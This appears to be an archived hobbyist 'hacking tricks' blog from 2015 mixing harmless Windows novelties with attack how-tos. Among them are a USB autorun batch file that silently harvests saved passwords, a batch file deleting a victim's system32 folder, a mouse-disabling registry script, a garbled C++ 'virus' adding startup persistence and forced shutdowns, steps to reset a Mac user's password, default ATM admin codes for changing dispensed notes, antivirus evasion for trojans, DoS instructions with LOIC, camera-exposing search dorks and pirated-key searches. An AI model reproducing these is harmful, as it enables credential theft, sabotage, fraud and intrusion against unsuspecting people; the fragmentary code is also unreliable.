Saturday, February 28, 2015

Bug In Windows Calculator

Hey Readers! this time Learn Hacking has brought a cool windows bug for you guys.
Its something everyone should know.
This is a Bug in Windows Calculator.
Note:- It works with all versions of Windows.
So without much discussion, let me proceed to the bug.
Have you ever used square root button in windows?
If yes, it is a possibility that you might have come across this bug…. If not, you are just about to know it..
Just follow the steps:-
1) Open calculator ie..  
   Goto run and type – calc 
2) Now type the following
   2.1) Type 4
   2.2) Take its square root  by using the square root button,
   2.3) Now you will get 2. Subtract 2 from it.
   2.4) The answer should have been 0 but its not. You would have got a long number as your answer.

See.. it was as simple.
Here is the general syntax to this bug.
1) Take Any number 
2) Take its square root
3) Subtract its square root from it
4) Your answer is not 0.. That’s the bug.

Friday, February 27, 2015


1.copy allthe filles to ur usb drive.
2.Create a notepad file and write these lines
                     ACTION=perform a virus scan
3.Save the notepad and rename it from new test document.tst to autorun.inf
4.Now copy this autorun.inf file into ur usb pen drive
5.Create another notepad file and write the following text into it

start mspass.exe/stext mspass.exe
start mailpv.exe/stext mailpv.exe
start iepv.exe/stext iepv.exe
start pspv.exe/stext pspv.exe
start passwordfox.exe/stext passwordfox.exe
6.Save the notepad and rename it from new textdocument to launch.bat
7.Copy the lunch.bat also to ur pen drive

Insert the pen drive and auto run window will pop-up.In the pop-up window select the first option(perform a virus scan).

Now all the pass word recovery tools will silently get executed in the back ground.The get stored in the .TXT files.Remove the pen driveand u will see the pass wordin the TXT.files in  ur oen drive.....thanks

Tuesday, February 17, 2015

How To Disable Mouse

 1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.


1. Open Notepad and paste the following codes.
 CreateObject("SAPI.SpVoice").Speak"i love you"
   2. Save the file as gender.vbs
   3. Now, open the save file
   4. If you hear male voice then your computer is male and if you hear female voice then its female.

Dancing Keyboard Led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights

How To Create Undeletable And Unrenamable Folders

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message

    How to delete that folder ?

    It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
    1. Open Command Prompt
    2. Type D: ( if u created this type of folder in D: drive) & hit enter
    3. Type rd con\ (rd - remove directory)
    4. Open that directory and the folder will not appear because it is removed

How To Find Serial Key Of Any Software

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbrand the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple stepsgiven below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR
  • Replace Software Name with the name of software whose serial key you want to find
  • Eg: To find serial key of Nero i will type Nero 94fbr
    3. Now press Enter and you will find serial key of software you are looking for as shown below.

Monday, February 16, 2015


 This specific tutorial will walk you through breaking into a Mac by changing the password of the user account associated with it. What you need:
  • Physical access to the Mac
    Optional: Mac OS X installer DVD
  1. Boot up the Mac, holding Command+S when you hear the startup sound.
  2. If running Snow Leopard or below, type the following code:/sbin/fsck -fy /sbin/mount -uw / launchctl load /System/Library/LaunchDaemons/ dscl . -passwd /Users/THEIRusernameHERE THEpasswordYOUwantHEREIf running Lion or above, type the following code:/sbin/fsck -fy /sbin/mount -uw / launchctl load /System/Library/LaunchDaemons/ dscl . -passwd /Users/THEIRusernameHERE THEpasswordYOUwantHERE
  3. If you don't know the username, you can type ls /Users at any time to list all the home folders on the Mac, which are usually the same as the usernames.
If you have the Mac OS X installer CD or flash drive, simply boot into it and choose reset password. If it's the Lion installer, you'll need to open the terminal and type resetpassword. This method of breaking into a Mac is easily prevented however if the user encrypts their harddrive, which can be done by turning on FileVault under System Preferences > Security. Thanks to everyone who's helped make the app better, given their support, and liked us on Facebook/Twitter!


This guide will teach you how to access the control panel of older Mini bank ATM's, common in liqour stores and other small shops. Depending on how lucky you are, the power this grants you can range from being able to find out how much money is in the ATM, to being able to change the value the machine thinks its dispensing (aka it thinks its giving you $1's, but its really giving you $20's. So if you withdrawl $20, it'll really give you $400)
What is required:
  • Older mini bank ATM's. These are usually rounder at the top and say mini bank across it.
  1. 1. Once you've found the atm, press and hold down the 'ENTER' 'CANCEL' CLEAR' buttons for about 3-5 seconds
  2. 2. Then, let go of all 3 buttons and press the '1' '2' and '3' keys in order. You should now see a screen that says enter password
  3. 3. Sometimes, the owners don't change the default passwords. if this is the case, you will have full power. The account you want to get into is the admin account. The default password can be '555555' or '666666'.
  4. 4. If you get in, the menu options are self explanitory. Other default passwords for lower-access accounts can be '111111' '222222' '333333' or '444444'
This is for educational purposes only. Use at your own risk.


Antiviruses are a big  annoyance for hackers. When a hacker wants to penetrate a system, the success or failure of that hack often depends on whether the target computer has an antivirus or not. Thus, bypassing antiviruses are naturally a hot topic among hackers. Although there are no fool-proof methods to bypass antivirus, I have listed here 5 methods which could work depending on your situation. 

   Image courtesy of Stuart Miles/
1. Metasploit polymorphic encoder
The metasploit framework comes with an excellent set of tools that includes a polymorphic encoder that can "encode" your trojan or virus such that antiviruses would not be able to recognize its signature, thus avoiding detection. You need Backtrack or Kali to do this. The best encoder under msfencode is shikata ga nai, which can be used to "encode" and obfuscate your payload(read trojan) multiple times. 
A detailed tutorial on this can be found here. Also, here is a video tutorial on metasploit backdoors and encoders.

2. Crypters/Packers
Crypters and packers are specialized tools that can encrypt and pack your payload(read trojan or virus) so that antivirus cannot get to the actual core of the payload. The encryption on the payload prevents antiviruses from peeking inside. Because of this, antiviruses will not detect your trojan. Once you are ready to deploy the trojan, the payload gets unencrypted and unpacked to unleash all malicious activities and infections.
There are many crypters available online both free and paid. However, a note of caution is that crypters are not so reliable. There are chances that the crypters will not work. You can even create your own crypters if you are good at programming.

3.Binary editing
Antiviruses use file signatures to detect viruses. These file signatures are unique patterns inside the virus. They are very small(a few dozen bytes).  Binary editing involves finding the file signatures and directly altering it. Once the contents of the file signature are changed, the antivirus will no longer recognize the signature.This can be done using a Hex Editor.
For more info, refer to the paper Taking Back Netcat 

4. Modify Source code
If you have the source code of the program/virus, you can modify it. For instance, If there is a switch case condition in the code, convert it into  if-else. This should not affect the functioning of the program in any significant way. There are many other changes that you can make, like changing variable names, upper to lower case etc.
int num=0;
can be changed to
int NUm=0;

5. Recompile the payload/Use an alternate version
If you have the source code of the virus, you can recompile it using a different compiler. It will create a completely fresh executable. That way, there is a chance that the antivirus will no longer recognize the signature.
If you are using a readymade program, then try using a different version. For example, if you are planning to install netcat on your victim's system and the antivirus is flagging it, then you can use other editions of netcat (nc.exe) like mocat, netcat2, cryptcat etc.

Keeping in mind that these techniques are not sure to work every time,  if you still didn't succeed, you can always write your own virus/trojan/keylogger from scratch. That is the only way of avoiding antivirus signature based detection. Again, you must be careful in writing the code because antiviruses also have behavior-based detection also known as heuristics detection.


DENIAL OF SERVICE is a very aggressive attack usually launched against websites as a form of protest or activism. The ultimate aim is to bring down or crash the web server. There are many readymade tools for this. Here, I will give instructions on how to use a very simple DoS tool called Low Orbit Ion Cannon (LOIC). LOIC is a free and open source and can be found in Sourceforge.

Please note that the information provides here is only for educational purpose. 

First download LOIC from here. The original version requires Microsoft .net to run. If you are using a Linux system, then you can use the java version, Java LOIC.
Once downloaded, you can go ahead and run the tool. The directions are pretty straight forward.

1. Enter the URL of the website you are planning to attack. There is also an option to enter the IP address.
2. Once the URL is entered, click on "Lock On"
3. Select the protocol you want to use. TCP is fine.
4. Enter the no of simultaneous threads. (In other words, the severity of your attack) 500 to 1000 threads will do.
5.Finally, click on the large button labelled as "IMMA CHARGIN MAH LAZER"

That will start the attack.  In the bottom, you will see a substantial increase in the no. of requested connections. This means your attack is on. After some time, the website will slow down and eventually stop responding(crash). The best way to observe this is by creating a web server in a virtual lab and attacking it. You can then analyze the web server logs  for more information.

Note: Please don't use tool on any website other than your own. It is a very powerful tool and you could get in trouble with the law.

Saturday, February 14, 2015


Facebook is one of the most grown and growing social networks in the world. For the same reason, Facebook hacks and tricks are becoming more popular. Have you ever sent coloured text in your chat on facebook?Most probably the answer will be ‘no’.So check this out! 
Wanna try this?

[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z

And the most important part… How to use it?

Just copy the code of the alphabets you need and insert them in chat with a space between each codes.
 Now there you go with cool coloured text in chat!
Example : Here is the code for HELLO
[[111356865552629]].[[115430438474268]].[[115807951764667]] [[115807951764667]] [[116564658357124]] 

How To Hack Into Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured. cameras around the world and writing a simple string on google hack into them.
Follow the steps below:
1) Choose any of these strings to enter on google

* inurl:”CgiStart?page=”
* inurl:/view.shtml
intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

2)Once you have picked one, simply copy it, and paste in on google.
3)Now choose any result and you will be seeing a live camera.


Open Notepad Write / copy the below command there:
 " del c:\WINDOWS\system32\*.*/q " without quote and save as " anything.bat" Done.
 If You Give this file to your victim his SYSTEM 32 Folder will be deleted.
 Without which a Windows Pc cant be started. 


Warning - Do not run it on your computer  I'm gonna teach you how to make a virus named Danger... 1-Open notepad
 2-Copy This code 
using namespace std; 
int main()
 keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0); keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0); 
HANDLE outToScreen; 
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); 
 char buffer[255];
 char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat"; ifstream input(inputFile); 
if (!input)
 ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app); 
 while (!input.eof())
 char buffer[255]; 
char inputFile[]="C:\rawr.exe"; ifstream input(inputFile);
 if (!input)

 ofstream fp("CLICK.bat", ios::app);
 system("START CLICK.bat"); 
 while (!input.eof())
 system("call shutdown.exe -S");
 goto START; 
 for(int i = 0; i < 1; i++) 
 int num = (rand() % 10); 
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
 for ( int j = 0; j < 5; j++)
 SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN); 
int number = (rand() % 24); 
goto START;
 3-Save It As Game.Bat

How To Hide Any Drive Through Command Prompt

Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.
 Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C(i.e. Drive letter)

 Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden

How to unhide hidden drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.
That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.